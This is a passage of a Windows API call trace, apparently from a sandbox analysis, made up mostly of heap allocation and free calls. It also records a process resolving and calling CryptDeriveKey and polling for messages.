hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0196.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9e40 [0196.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9e40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0196.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.513] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.514] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.520] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.520] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.520] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.521] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.521] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.521] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.521] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.521] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 